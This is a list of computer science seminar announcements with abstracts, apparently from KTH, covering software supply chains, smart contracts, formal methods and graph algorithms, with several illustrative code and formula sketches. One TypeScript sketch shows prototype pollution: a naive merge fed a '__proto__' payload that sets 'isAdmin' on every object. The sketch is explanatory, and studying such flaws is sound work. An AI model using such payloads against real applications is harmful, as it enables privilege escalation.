Please let Vivi Andersson know if you want to give a seminar or receive email announcements about upcoming seminars.
Markus Borg (CodeScene / Lund University) | 14:00 in Room 1440, Henrik Eriksson
CodeScene is a modern software engineering intelligence platform that blends static code analysis with insights into organizational dynamics. Unlike traditional tools that focus solely on code quality, CodeScene also provides insights into the human aspects of software development. Core features of CodeScene include technical debt management and software visualization. CodeScene provides assistance through automated code reviews and quality gates in the CI pipeline, e.g., detecting code smells in pull requests. Moreover, CodeScene provides an IDE integration for VS Code that helps developers mitigate code smells before committing code. Thanks to the advent of LLMs, CodeScene now offers code smell remediation in the IDE – a freemium solution that has been available for selected code smells since December 2024. In this talk, I will demo key CodeScene features and introduce the research we are doing related to technical debt management and AI-assisted development. Furthermore, I will share personal reflections on my role as a researcher with an industrial tool vendor – a position I’ve now had for 2.5 years.
Liane Colonna (Stockholm University/Swedish Law and Informatics Research Institute) | 15:00 in Room 1537 "Germund Dahlquist"
Rooted in idealism, the open-source model leverages collaborative intelligence to drive innovation, leading to major benefits for both industry and society. As open-source software (OSS) plays an increasingly central role in driving the digitalization of society, policymakers are examining the interactions between upstream open-source communities and downstream manufacturers. They aim to leverage the benefits of OSS, such as performance enhancements and adaptability across diverse domains, while ensuring software security and accountability. The regulatory landscape is on the brink of a major transformation with the recent adoption of both the Cyber Resilience Act (CRA) and the Product Liability Directive (PLD), raising concerns that these laws could threaten the future of OSS.
This paper investigates how the CRA and the PLD regulate OSS, specifically exploring the scope of exemptions found in the laws. It further explores how OSS practices might adapt to the evolving regulatory landscape, focusing on the importance of documentation practices to support compliance obligations, thereby ensuring OSS's continued relevance and viability. It concludes that due diligence requirements mandate a thorough assessment of OSS components to ensure their safety for integration into commercial products and services. Documentation practices like security attestations, Software Bill of Materials (SBOMs), data cards and model cards will play an increasingly important role in the software supply chain to ensure that downstream entities can meet their obligations under these new legal frameworks.
Link to paper: https://www.sciencedirect.com/science/article/pii/S0267364924001705
Eric Cornelissen (KTH) | 13:00 in Room 1440, Henrik Eriksson
Node.js and the JavaScript ecosystem have a reputation for complex supply chains and a large volume of publicly disclosed security advisories. Systematically attacking and defending JavaScript-based applications is a challenging task due to the dynamic nature of the language. In this seminar, we present our work on both fronts, attack and defense, for the supply chain of server-side JavaScript applications. For the former, we present a semi-automated dynamic analysis pipeline for uncovering prototype pollution (a class of vulnerabilities unique to JavaScript) gadgets in server-side JavaScript runtimes. For the latter, we present ongoing research into runtime hardening of JavaScript applications through SBOM and capability enforcement.
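For readers unfamiliar with the vulnerability class, here is a minimal, self-contained sketch of prototype pollution (my own illustration, not code from the presented work): a naive recursive merge of attacker-controlled JSON lets the attacker write to Object.prototype, from which every plain object inherits.

```typescript
// Minimal prototype pollution sketch (illustrative only): a naive
// recursive merge copies attacker-controlled keys, including
// "__proto__", into the target object.
function merge(target: any, source: any): any {
  for (const key of Object.keys(source)) {
    if (typeof source[key] === "object" && source[key] !== null) {
      if (typeof target[key] !== "object" || target[key] === null) {
        target[key] = {};
      }
      merge(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// Attacker-controlled JSON, e.g. from an HTTP request body.
// JSON.parse defines "__proto__" as an own property, so merge recurses
// into Object.prototype and plants the attacker's property there.
const payload = JSON.parse('{"__proto__": {"isAdmin": true}}');
merge({}, payload);

// Every plain object now inherits the polluted property:
const victim: any = {};
console.log(victim.isAdmin); // true
```

A "gadget" is then any piece of code whose behavior changes when it reads such an inherited property, which is what the dynamic analysis pipeline mentioned above hunts for.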
Marjan Sirjani (Mälardalen University) | 11:00 in Room 4523, Stefan Arnborg
A potential problem in distributed control systems is that redundancy plans may yield more than one primary controller, which can lead to inconsistency. We worked on an algorithm called NRP FD (Network Reference Point Failure Detection), proposed by industry, which addresses this issue by prioritizing consistency over availability. I will explain how, using modeling and formal verification, we discovered an issue in NRP FD where we may have two primary controllers at the same time. We then provide a solution to mitigate the identified issue, thereby enhancing the robustness and reliability of such systems. In the same context, I will also show how we used model checking to make informed decisions when designing test cases for fault-tolerant systems. I will conclude with a discussion of how this approach may be generalized to different contexts.
Christof Ferreira Torres (Instituto Superior Técnico Lisboa) | 10:00 in Room 1440, Henrik Eriksson and https://kth-se.zoom.us/j/66862244070
Modern blockchains, like Ethereum, have surged in popularity over recent years, unlocking access to new financial instruments known as decentralized finance (DeFi). The security of DeFi largely depends on the security of smart contracts, which are programs deployed and executed across the blockchain. Like traditional software, smart contracts are prone to programming errors. However, unlike traditional code, their code is publicly visible and immutable. On platforms like Ethereum, smart contracts currently manage funds worth billions of dollars, making them a prime target for attackers. Over the past few years, numerous exploits have targeted smart contracts. In this talk, we will briefly explore the challenges and insights into detecting vulnerabilities in smart contracts through techniques like symbolic execution and fuzzing. We will also discuss the differences between traditional software security and economic security in the context of smart contracts. Finally, we will look at how automated program repair, using context-aware patch templates, can help protect vulnerable smart contracts.
Giacomo Benedetti (University of Genoa) | 11:00 in Room 4523, Stefan Arnborg
The integrity of software builds is fundamental to the security of the software supply chain. While Thompson first raised the potential for attacks on build infrastructure in 1984, limited attention has been given to build integrity in the past 40 years, enabling recent attacks on SolarWinds, xz, and Ultralytics. The best-known defense against build system attacks is creating reproducible builds; however, achieving them can be complex for both technical and social reasons and thus is often viewed as impractical to obtain.
In this study, we analyze the reproducibility of builds in a novel context: reusable components distributed as packages in six popular software ecosystems (npm, Maven, PyPI, Go, RubyGems, and Cargo). A quantitative study on a representative sample of packages in each ecosystem raises concerns: Rates of reproducible builds vary widely between ecosystems, with some ecosystems having all packages reproducible whereas others have reproducibility issues in nearly every package.
However, upon deeper investigation, we identified that with relatively straightforward infrastructure configuration and patching of build tools, we can achieve very high rates of reproducible builds in all studied ecosystems. We conclude that if the ecosystems adopt our suggestions, the build process of published packages can be independently confirmed for nearly all packages without individual developer actions, and doing so will prevent significant future software supply chain attacks.
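Conceptually, the independent confirmation mentioned above amounts to rebuilding a package from the same sources and comparing the artifacts bit for bit. A minimal sketch of such a check (my own illustration with hypothetical file names, not the study's tooling):

```typescript
// Illustrative sketch (not the study's tooling): a build is
// reproducible if an independent rebuild yields a bit-for-bit
// identical artifact, which we can check by comparing digests.
import { createHash } from "node:crypto";
import { readFileSync } from "node:fs";

function sha256(path: string): string {
  return createHash("sha256").update(readFileSync(path)).digest("hex");
}

// Hypothetical paths: the artifact published to the registry, and the
// artifact produced by an independent rebuild from the same sources.
const published = sha256("pkg-1.2.3-published.tgz");
const rebuilt = sha256("pkg-1.2.3-rebuilt.tgz");

console.log(published === rebuilt
  ? "reproducible: digests match"
  : "not reproducible: digests differ");
```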
Javier Ron (KTH) | 10:00 in Room 4523
In this seminar I will present two works related to N-Version Programming. The first focuses on leveraging existing diversity in blockchain protocols to increase node availability; the second on the automated generation of N-version functions. Specifically, I first introduce N-ETH, an N-version Ethereum blockchain node designed to improve availability under unstable execution environments. By leveraging diverse Ethereum node implementations, N-ETH mitigates faults by relying on their asymmetric behavior, which we validate via system-call-level fault injection experiments. Then, I present GALÁPAGOS, a tool that uses large language models (LLMs) to automate the generation of diverse function variants for the creation of N-version programs. GALÁPAGOS generates functionally equivalent yet diverse software variants to mitigate miscompilation bugs. Together, these works demonstrate how system-level diversity and AI-driven software generation can provide robust fault-tolerance solutions for modern computing environments.
Honglian Wang (KTH) | 15:00 in Room 1440 and https://kth-se.zoom.us/j/3467429329
In this seminar, I will present two projects.
The first project, titled "Sequential Diversification with Provable Guarantees," addresses the sequential diversity maximization problem, a widely studied topic with applications in information retrieval and recommendation systems. Unlike traditional diversity maximization, we focus on a sequential setting where a user interacts with a sequence of items presented in a predefined order. At each step, the user can choose to engage with an item or quit the interaction based on certain probabilities. The objective is to determine the optimal ordering of items to maximize the expected sequential diversity the user accumulates before quitting. To tackle this, we developed two approximation algorithms and established their provable guarantees.
The second project, "Fairness-Aware PageRank via Edge Reweighting," explores the emerging problem of improving group fairness in the PageRank vector. Existing research primarily modifies inputs to the PageRank algorithm, such as the transition matrix, restart vector, or restart probability, without altering the algorithm itself. In this paper, we achieve fairness by reweighting the edge weights of the input graph. We propose a fairness loss function, which is non-convex, and optimize it with a gradient descent approach.
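For orientation, the standard personalized-PageRank formulation that edge reweighting acts on is shown below; the group-fairness loss is sketched in a generic form, and the paper's exact (non-convex) loss may differ.

```latex
% PageRank with restart probability \alpha, restart vector v, and the
% transition matrix P(w) induced by edge weights w:
\pi(w)^{\top} = \alpha\, v^{\top} + (1 - \alpha)\, \pi(w)^{\top} P(w)
% A generic group-fairness loss for a protected group S with target
% PageRank mass \phi (the paper's exact loss may differ):
\mathcal{L}(w) = \Big( \textstyle\sum_{i \in S} \pi_i(w) - \phi \Big)^{2}
% which can be minimized over the edge weights w by gradient descent.
```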
Yifei Jin (KTH) | 13:00 in Ada Room, Electrum and https://kth-se.zoom.us/j/62775642421
In this seminar, I will present three published papers and one under-review submission, all centered around the application of Graph Representation Learning (GRL)—encompassing Graph Neural Networks and Relational Representation Learning—to radio networks for enhanced user quality of service (QoS) estimation. With recent advancements toward 6G, network topologies have become denser and more complex, featuring intricate relational dependencies between network nodes and the surrounding RF environment. Traditional deep learning approaches, however, struggle to integrate domain-specific heuristics as representational priors within these models. Additionally, existing methods often lack the expressiveness needed to capture categorical structures, such as performance bottlenecks across multiple routing paths and inter-relations in cellular coverage. By embedding graph and relational modalities into GRL models, our work demonstrates substantial performance gains over state-of-the-art approaches, underscoring the value of domain-informed representation learning in complex network scenarios.
Zhe Ye (UC Berkeley) | 17:00 in Zoom
An optimistic rollup (ORU) scales a blockchain’s throughput by delegating computation to an untrusted remote chain (L2), refereeing any state claim disagreements between mutually distrusting L2 operators via an interactive dispute resolution protocol. State-of-the-art ORUs employ a monolithic dispute resolution protocol that tightly couples an L1 referee with a specific L2 client binary – oblivious to the system’s higher-level semantics. We argue that this approach (1) magnifies monoculture failure risk, by precluding trust-minimized and permissionless participation using operator-chosen client software; (2) leads to an unnecessarily large and difficult-to-audit TCB; and (3) suffers from a frequently-triggered, yet opaque upgrade process – both further increasing auditing overhead and broadening the governance attack surface. To address these concerns, we outline a methodology for designing a secure and resilient ORU with a minimal TCB, by facilitating opportunistic 1-of-N-version programming. Due to its unique challenges and opportunities, we ground this work concretely in the context of the Ethereum ecosystem – where ORUs have gained significant traction. Specifically, we design a semantically-aware proof system, natively targeting the EVM and its instruction set. We present an implementation in a new ORU, Specular, that opportunistically leverages Ethereum’s existing client diversity with minimal source modification, demonstrating our approach’s feasibility.
Frank Reyes García (KTH) | 11:00 in Room 4523
In modern software development, it is common to rely on third-party dependencies, which facilitates code reuse and speeds up project delivery. However, updating these dependencies carries significant risks, as even minor version changes can introduce breaking changes that cause compilation of the application to fail. In this talk, we present two innovative contributions to address the challenges posed by breaking dependency updates: BUMP, a benchmark of reproducible breaking dependency updates, and Breaking-Good, an automated analysis tool for fixing these failures.
BUMP contains 571 real-world breaking dependency updates from 153 Java projects, ensuring reproducibility through Docker containers. This benchmark serves as a critical resource for researchers and developers, enabling consistent evaluations of tools that mitigate the impact of breaking changes.
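To illustrate the kind of failure BUMP captures, here is a toy sketch of a breaking dependency update (BUMP itself targets Java projects; TypeScript is used here only for brevity):

```typescript
// Toy illustration of a breaking dependency update (BUMP targets Java
// projects; TypeScript is used here only for brevity).

// dependency, version 1.1.0:
function parse(input: string): number {
  return Number(input);
}

// client code, written against 1.1.0 -- compiles and runs today:
const port = parse("8080");
console.log(port); // 8080

// dependency, version 1.2.0 -- a seemingly minor release that adds a
// required parameter; the client call above now fails to compile with
// "Expected 2 arguments, but got 1":
//
//   function parse(input: string, opts: { radix: number }): number {
//     return parseInt(input, opts.radix);
//   }
```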
Breaking-Good complements BUMP by providing an automated approach to understanding the root causes of build failures associated with dependency updates. By analyzing build logs and configuration files, Breaking-Good generates explanations and potential solutions for identified problems, significantly simplifying the debugging process for developers.
Together, these contributions increase the soundness of software development practices by improving the handling of dependency updates.
Larissa Schmid (Karlsruhe Institute of Technology (KIT)) | 11:00 in Room 1537
In this talk, I will present my past and current research. The main focus will be on my work on automated performance modeling and benchmarking methodologies for scientific software and serverless workflows. In this work, we introduce a methodology that reduces the cost of performance modeling by identifying parameters relevant to performance and exploiting insights about their interaction, using the results of a code analysis. Moreover, we introduce SeBS-Flow, a benchmarking suite for serverless workflows, enabling comparative analysis across cloud platforms. In another line of research, we are investigating plagiarism detection in computer science education and how we can automatically detect plagiarized solutions in the face of increasingly sophisticated obfuscation techniques, including AI-based methods. Finally, I will touch upon my personal commitment to diversity in computer science, more specifically my investigation of the factors encouraging and discouraging women from pursuing a PhD in computer science.
Tianyi Zhou (KTH) | 10:00 in Room 1440 and https://kth-se.zoom.us/j/3467429329
Online media is an important part of the modern information society, and it is expected to foster diversity and break information barriers. However, the reality is quite the opposite: online media platforms often reinforce users' preexisting beliefs by showing them content that aligns with their views, creating "echo chambers" where diverse perspectives are ignored. The result is greater social and political polarization.
In this talk, I will present two novel approaches that attempt to reduce online media polarization and foster information diversity. The first work focuses on modeling the impact of timeline algorithms on the political opinions of users. Timeline algorithms are key components of online social platforms like X (Twitter), but in recent years they have been blamed for increasing polarization and disagreement in our society. Opinion-dynamics models have been used to study a variety of phenomena in online social networks (a standard such model is sketched after this abstract), but an open question remains on how these models can be augmented to take into account the fine-grained impact of user-level timeline algorithms. We make progress on this question by providing a way to model the impact of timeline algorithms on opinion dynamics. We use our model to study the problem of minimizing polarization and disagreement, and present a gradient descent-based algorithm for this problem with a theoretical guarantee.

The second work was inspired by a recent debate about whether automated news aggregators, like Google News, which recommend articles from various online sources, lead readers to content that reinforces their existing beliefs and restricts their exposure to a diversity of perspectives. We design methods for selecting a set of articles that simultaneously cover all possible viewpoints while also taking into account user preferences. In particular, we explore the trade-off between different viewpoint-coverage strategies and identify the most preferable strategy for our requirements. Through extensive experiments and case studies, we show that even though news aggregators may cover all news stories using articles from diverse media outlets, this can still lead to biased stances toward the entities mentioned in the articles. We show how this issue can be mitigated while still covering all stories and keeping the number of recommended articles small.
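The sketch below shows the Friedkin-Johnsen model, a common baseline in the opinion-dynamics literature, together with the usual polarization-plus-disagreement objective; that the paper builds on exactly this variant is my assumption.

```latex
% Friedkin--Johnsen dynamics: user i has an innate opinion s_i and an
% expressed opinion z_i that equilibrates under neighbor averaging:
z_i = \frac{s_i + \sum_{j} w_{ij}\, z_j}{1 + \sum_{j} w_{ij}}
% In matrix form, with L the Laplacian of the weighted graph:
z = (I + L)^{-1} s
% A typical objective minimizes polarization plus disagreement, where
% \bar{z} is the mean-centered equilibrium opinion vector:
\min \;\; \bar{z}^{\top}\bar{z} \;+\; \sum_{(i,j)} w_{ij}\,(z_i - z_j)^2
```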
Aman Sharma (KTH) | 11:00 in Room 4523 and https://kth-se.zoom.us/j/64844199459
With the rise of Free and Open Source Software, software is increasingly built on top of other software, forming a nested dependency graph that is part of the software supply chain. Malicious actors can attack this software supply chain in multiple ways, one of which is by exploiting a vulnerability in one of the dependencies of a particular piece of software. These attacks are referred to as software supply chain attacks. Such an attack can take place while the application is running, by triggering malicious code execution that leads to the application's compromise.
In this talk, we discuss a novel approach [1] to mitigate such attacks: a tool that attaches to the application at runtime and prevents the execution of malicious code. We then demonstrate how this approach can mitigate one of the most infamous attacks, Log4Shell [2], which triggers the download and execution of unknown code at runtime. Next, we acknowledge other related work in the field, and finally, we discuss the new ideas that have emerged from this research.
[1] https://arxiv.org/abs/2407.00246 [2] https://en.wikipedia.org/wiki/Log4Shell
Jesper Amilon (KTH) | 13:15 in Room 4523 and https://kth-se.zoom.us/j/63471645347
Within embedded systems software, correctness relies mainly on testing techniques. While testing may serve well as a bug-catcher, it cannot be used to formally prove the absence of bugs. For this, an exhaustive method, i.e., formal verification, is required. However, the cost and level of skill needed for formal verification mean that it is often overlooked by industry. Furthermore, several common software aspects, a prominent one being floating-point arithmetic, are not well supported by state-of-the-art tools. In this seminar, we present our work on formal verification of embedded-systems software at the Swedish heavy-vehicle manufacturer Scania, where we focus on automating the verification process to allow for easier integration of formal verification into the development chain. To this end, we present work on the automated verification of properties of C arrays. We will also discuss an approach for combining deductive verification and model checking. Lastly, we describe ongoing research on the verification of C programs with floating-point arithmetic.
Karolina Gorna | 11:00 in Room 1537
Public blockchain networks have faced security challenges at both the protocol and application levels for over a decade. To address scalability issues and high transaction fees on primary networks (Layer 1), secondary layers (Layer 2) such as rollups have been developed. They claim to offload transaction execution while maintaining Layer 1's security standards. This research aims to confirm or refute this hypothesis by applying a concolic execution methodology to Layer 2 software client binaries, studying their effectiveness in preserving security equivalence with Layer 1.
Mojtaba Eshghie (KTH) | 10:30 in Room 1537 and https://kth-se.zoom.us/j/7998785238
Smart contracts are self-executing programs used to implement business transactions as code. Because smart contracts handle significant monetary assets, they are prime targets for exploitation—successful attacks on smart contract applications in 2024 amount to more than 100 million USD per month. Among the various types of vulnerabilities involved in these attacks, business logic vulnerabilities pose a particularly serious threat.
Despite their severity, previous research has largely overlooked business logic vulnerabilities. These flaws are not easily recognizable, as they deviate from the expected program behavior and do not follow traditional patterns, complicating their detection with analysis tools, especially static analysis. Identifying business logic flaws requires understanding the contract’s intended behavior, often through a formal specification. We propose using DCR graphs, a well-known declarative modeling notation from business process modeling research, to capture the business logic of smart contracts.
To defend against business logic vulnerabilities, we have developed a monitoring tool that uses formal DCR specifications of the contract and monitors the interactions (transactions) with the contract.
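To make the monitoring idea concrete, here is a minimal sketch of a DCR-style runtime monitor (my own illustration under simplifying assumptions, not the actual tool; real DCR graphs also have include/exclude and milestone relations):

```typescript
// Minimal DCR-style monitor sketch (illustrative only). We check two
// relations over observed transactions:
//   condition [src, tgt]: src must have executed before tgt may fire;
//   response  [src, tgt]: once src fires, tgt must eventually fire.
type DcrEvent = string;

interface DcrGraph {
  conditions: Array<[DcrEvent, DcrEvent]>;
  responses: Array<[DcrEvent, DcrEvent]>;
}

class DcrMonitor {
  private executed = new Set<DcrEvent>();
  private pending = new Set<DcrEvent>();

  constructor(private graph: DcrGraph) {}

  // Process one observed transaction; returns false on a violation.
  observe(e: DcrEvent): boolean {
    for (const [src, tgt] of this.graph.conditions) {
      if (tgt === e && !this.executed.has(src)) return false;
    }
    this.executed.add(e);
    this.pending.delete(e); // e discharges its own pending obligation
    for (const [src, tgt] of this.graph.responses) {
      if (src === e) this.pending.add(tgt); // new obligation
    }
    return true;
  }

  // Obligations not yet discharged at the end of a run.
  unmetObligations(): DcrEvent[] {
    return [...this.pending];
  }
}

// Hypothetical escrow-like contract: "release" requires a prior
// "deposit", and every "deposit" obliges an eventual "release".
const monitor = new DcrMonitor({
  conditions: [["deposit", "release"]],
  responses: [["deposit", "release"]],
});
console.log(monitor.observe("release")); // false: condition violated
console.log(monitor.observe("deposit")); // true
console.log(monitor.unmetObligations()); // ["release"]
```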
The ground truth used to train and test smart contract analysis tools, such as our monitoring tool, is often based on the verdicts of other tools rather than actual verification results, since full verification does not scale. Furthermore, existing data sets lack concrete exploit examples. To address these shortcomings for our tool evaluation, and to provide a methodology for other analysis tool developers, we generate and use concrete vulnerability-exploit pairs as verdicts. We demonstrate our oracle-guided methodology for diversifying and synthesizing business logic exploits, and show its efficiency when the formal DCR specification of the contract is built into the prompts.
Anoud Alshnakat (KTH) | 13:15 in Room 1537 and https://kth-se.zoom.us/my/anoud
The rise of Software-Defined Networking has introduced domain-specific languages such as P4, allowing engineers to program data plane devices (switches). While this flexibility enables faster network development, programmability also naturally introduces the risk of errors in P4 programs. Additionally, P4 introduces security challenges, such as information leakage through complex data dependencies in network packet processing, which might expose sensitive data.
In this seminar, I will present HOL4P4, a formalization of P4 semantics in the HOL4 interactive theorem prover. This semantics provides a formal foundation for the verification of P4 software. Furthermore, I will introduce a novel type system designed to ensure the progress and preservation properties. Additionally, I will illustrate the semantics and type system with examples.
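For reference, "progress and preservation" are the standard type-soundness pair, stated generically below; HOL4P4 phrases these properties over P4's small-step semantics.

```latex
% The standard type-soundness pair, stated generically; HOL4P4 phrases
% these properties over P4's small-step semantics.
\text{Progress:}\quad \vdash e : \tau \;\Rightarrow\;
  e \text{ is a value} \;\lor\; \exists e'.\; e \longrightarrow e'
\text{Preservation:}\quad \vdash e : \tau \;\land\; e \longrightarrow e'
  \;\Rightarrow\; \vdash e' : \tau
```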
Furthermore, I will introduce P4Sec, a novel approach to securing P4 programs. P4Sec is based on a combination of security type systems and interval analysis to track information flow and enforce data-dependent security policies.
Toshiaki Aoki (Japan Advanced Institute of Science and Technology) | 10:00 in Teknikringen 33, Room 3412 and https://kth-se.zoom.us/j/9776973454
We are working on practical applications of formal methods to automotive systems. So far, we have successfully applied formal methods to automotive operating systems, including OSEK/VDX, Classic AUTOSAR, and Adaptive AUTOSAR OSs. We would like to extend our targets to more modern automotive system platforms, in particular those for automated driving systems. Modern automotive systems consist of AI for perception and planning, control, and basic software for high-performance computing. Recently, we were awarded a JST/CREST project titled 'Formal Methods and Verification Tools for Next-generation Automotive System Platforms', which focuses on such modern automotive systems. This project aims at proposing formal methods and verification tools to ensure the safety and reliability of next-generation automotive system platforms. These formal methods and verification tools cover functions from perception to control, and we insist on their practical application to real systems. In this talk, I will give an overview of the JST/CREST project after presenting the research results we have obtained so far.
Sijing Tu (KTH) | 10:30 in Room 1537 and https://kth-se.zoom.us/j/3467429329
In contemporary society, online social networks play an essential role in people's lives, serving as platforms to maintain connections, access information, and express views on political and societal issues. Against this background, online social networks present numerous data science challenges. These include traditional graph mining tasks, such as detecting communities in the network, and new tasks, such as increasing the diversity of information exposure.
In this seminar, I will discuss some data science challenges in our research, focusing on our theoretical approaches to formulating and solving these problems. The problems discussed are NP-hard, with some objective functions being #P-hard to evaluate. The presentation involves five research papers that constitute my dissertation. In all of these papers, we compare our approaches against multiple baseline algorithms and heuristics and demonstrate the effectiveness of our methods. Below are high-level descriptions of these papers:
(1) Assuming the presence of two opposing political campaigns using social marketing, we aim to select disjoint seed sets for both sides to maximize the number of individuals receiving both sides' information. We model this as a combinatorial optimization problem under a p-system constraint and derive the approximation ratio of our approach. For efficient computation, we generalize the reverse-reachable sampling technique.
(2) Assuming that individuals' opinions vary within the interval [-1,1], our objective is to nudge some opinions within a predefined budget to maximize the network diversity. We apply the semidefinite relaxation approach to solve our problem and show the effectiveness of our approaches through experimental evaluation.
(3) To understand how viral marketing shapes individuals' opinions, we introduce the spread-acknowledge model: individuals' private opinions update when exposed to viral information, and their public opinions keep adjusting due to social pressure. We propose an efficient algorithm to estimate the equilibrium opinions and polarization of the network.
(4) To assess the impact of an adversary, we study how much polarization a weak adversary, which only knows the network structure and can nudge k individuals' opinions, can introduce to the network. The problem is a cardinality-constrained max-cut problem on a graph with positive and negative edge weights. We apply the semidefinite relaxation approach to obtain a constant-factor approximation ratio under certain assumptions.
(5) We study variations of the densest k-subgraph and cardinality-constrained max-cut problems. Assuming there is an initial subgraph/cut on a graph with n nodes, our goal is to change k nodes' positions with respect to the subgraph/partition, to maximize the density/cut. We apply semidefinite relaxation approaches (the basic relaxation template is sketched after this list) and obtain constant-factor approximation ratios assuming k = Ω(n). For the max-cut variant, we generalize the sum-of-squares relaxation applied in max-bisection and show that the optimality of the approximation ratio still holds in some regimes of k.
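The semidefinite relaxations in (2), (4), and (5) follow the classical Goemans-Williamson template, shown below in its basic max-cut form; the papers add cardinality constraints and signed edge weights on top of it.

```latex
% Classical Goemans--Williamson template behind the semidefinite
% relaxations in (2), (4), and (5). The integer program
\max_{x \in \{-1,+1\}^n} \;\frac{1}{4} \sum_{(i,j)} w_{ij}\,(1 - x_i x_j)
% relaxes, by replacing x x^{\top} with a PSD matrix X, to
\max_{X \succeq 0,\; X_{ii} = 1} \;\frac{1}{4} \sum_{(i,j)} w_{ij}\,(1 - X_{ij})
```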
The whole seminar will last 90 minutes, with a 45-minute presentation. At the end of the presentation, the quality of the research work will be evaluated. Moreover, we will discuss how the current research can be improved and how to position it in my thesis.
Fabian Farestam | 15:00 in Room 1537 and Zoom
In this talk, we explore the challenges of attaining common knowledge in asymmetric multi-agent games with imperfect information. As a running example, we use a conceptual game involving an active sensor-less agent and a passive observer agent. Through this example, we demonstrate that common knowledge is inherently unattainable in such games. Our proof, laid out through a number of theoretical constructions, highlights the complexities and strategic depth of decision-making under uncertainty. With our findings we hope to enhance our understanding of strategic planning under imperfect information.
Daniel-Jesus Munoz (Universidad de Málaga) | 14:15 in Room 1537 and https://kth-se.zoom.us/j/66909147040
Product lines are highly configurable systems with numerous common and reusable components representing a family of products. Modelling real-world Software Product Lines (SPLs) in (pseudo) standards supported by automated reasoners is subject to many limitations when dealing with numerical components (i.e., numerical features) and quantitative properties (i.e., quality attributes). Additionally, interesting quantitative properties can be too complex to approximate in the feature space (e.g., energy requirements), and solution spaces can be too large to analyse. In this seminar, I will present the complexities of real-world SPL analysis, the difficulties of complex quantitative properties, the limitations of colossal solution spaces, and propose a range of possible solutions - some of them as exotic as Category Theory.
Ruo-Chun Tzeng (KTH) | 13:00 in Room 4523 (Stefan Arnborg) and https://kth-se.zoom.us/j/67689867244
This talk is divided into two parts, each consisting of two papers. The first part focuses on graph mining problems that can be described as Rayleigh quotient optimization (the relevant quantities are sketched after this list). The second part focuses on improving the computational efficiency of combinatorial semi-bandits. For both parts, we develop algorithms with provable guarantees and compare them with the baselines or the fundamental limits. Below is a summary of the four papers:

(i) Conflicting group detection aims to find k disjoint node subsets such that intra-group edges are mostly positive and inter-group edges are mostly negative. We extend the approach of a prior work on 2-conflicting group detection to k >= 2. Our approach is empirically very competitive compared to the baselines. The main techniques are randomized rounding and an eigenvector-based algorithm.

(ii) For an eigensolver using O(dn) space and q passes, Randomized SVD is the most preferable method. We focus on the multiplicative ratio R(u), defined as the ratio of the Rayleigh quotient of u to the largest eigenvalue. However, Randomized SVD has no theoretical guarantee for R in the o(ln n)-pass regime. This raises the natural question: are Ω(ln n) passes necessary for Randomized SVD to provide a non-trivial guarantee? We answer this question by sharpening the theoretical guarantee of Randomized SVD for R in the o(ln n)-pass regime for PSD matrices, and we also extend our results to provide non-trivial guarantees for some indefinite matrices. The main technique is the random projection lemma.

(iii) Best-arm identification with fixed confidence under combinatorial semi-bandit feedback is a game between a learner and a stochastic environment. At each round, the learner selects an action to pull and observes a noisy reward for each arm in the selected action. The goal is to identify the best action with probability at least 1−δ while using as few samples as possible. For this problem, several statistically optimal approaches exist, but none of them are computationally efficient. We close the computational-statistical gap by proposing the first optimal algorithm that runs in polynomial time. The main techniques are a two-player zero-sum game, stochastic smoothing, and the Frank-Wolfe algorithm.

(iv) In the matroid semi-bandit problem in regret minimization, the action set is the set of bases of a given matroid, and the goal is to identify the best base (action) while minimizing the cumulative regret. There exist competitive algorithms (CUCB) and instance-specifically optimal algorithms (KL-OSM), but both require time complexity at least linear in the number K of arms. Building on CUCB, we develop an algorithm whose per-round time complexity is sublinear in K. The main techniques are minimum hitting sets and rounding.
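For orientation, the quantities behind (i) and (ii) are the Rayleigh quotient of a symmetric matrix A at a vector u, and its normalization by the largest eigenvalue:

```latex
% The Rayleigh quotient of a symmetric matrix A at a vector u, and the
% multiplicative ratio R(u) from (ii): the Rayleigh quotient normalized
% by the largest eigenvalue \lambda_1(A).
\rho_A(u) = \frac{u^{\top} A\, u}{u^{\top} u},
\qquad
R(u) = \frac{\rho_A(u)}{\lambda_1(A)}
```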
Liyi Zhou (Imperial College London) | 10:00 in Zoom (https://kth-se.zoom.us/j/67833778211)
Did you know that attacks on blockchain, particularly in the realm of Decentralized Finance (DeFi), have resulted in a staggering loss of over USD 5 billion? In this presentation, I will unveil my vision for transforming the blockchain landscape, emphasizing a suite of intrusion prevention & detection tools that I believe could significantly enhance the safety and robustness of DeFi systems. I will also discuss BlockLLM, a real-time intrusion detection system trained on 68 million transactions. Among 124 attacks, BlockLLM successfully ranked 49 as the top three most aberrant transactions in their interactions with the victim application, potentially preventing USD 276 million in losses.
Camilla Björn (KTH) | 10:15 in Room 1537 and https://kth-se.zoom.us/j/68401572145
Progression is a term which, in recent years, has become more frequently used in higher education. Despite this, it is not always clear what it refers to and how the progression will take place. In a study from last year, we found three main disambiguations of the term in the literature. Progression is sometimes viewed in terms of completion or retention, focusing on increasing the number of students graduating from (progressing through) the programme. It can also be used in the context of the necessary progression (steps) to learn a topic, often referred to as learning progressions. Finally, it can be used when referring to the planned progression built into the curriculum design. This is the meaning of the term I focus on in my work, and I call it built-in progression to distinguish it from the other interpretations.
Built-in progression is an important concept for creating coherence in educational programmes, and I would argue it is fundamental to developing a programme designed to help the students reach the programme objectives. Since the Bologna Process, the pressure to design programmes with progression in mind has increased. However, it is a non-trivial task and, considering its importance, it has received surprisingly little attention. In curriculum design, it is also important to acknowledge the gap between the planned curriculum and the one the students experience in real life, since this can help us create a curriculum that translates better into reality. In my work, I aim to increase the understanding of built-in progression and create a conceptual framework to help design programmes with realistic and thoughtful progressions. In addition, I hope to be able to present my research in a way that helps the recipient feel empathy for and understand some of the students’ perspectives. Understanding how the curriculum can impact the students, as well as having empathy for them, is important both when designing and when teaching the curriculum.
In this seminar, I will start with a presentation on my research and thesis plan followed by a discussion with Professor Arnold Pears from the Department of Learning in Engineering Sciences.
Henrik Karlsson (KTH) | 15:00 in Room 4523 and https://kth-se.zoom.us/j/65862564111
Traditionally, safety-critical embedded systems have been implemented as distributed computing systems, ensuring that faults in one component cannot easily propagate to other components. However, due to the ever-increasing need for computational power and the need to reduce a system's physical size, weight, and power consumption (SWaP), there has been a push toward integrating these distributed components into a single unit. For this reason, the concept of a separation kernel is popular within safety-critical systems. A separation kernel is an OS kernel that robustly partitions a computer system's resources, allowing one to safely and securely integrate multiple system components onto a single chip, and thus reduce a system's overall SWaP. However, with the increasing connectivity of critical systems and the resulting cyber threats, there is also a need to improve the security of the separation kernel itself.
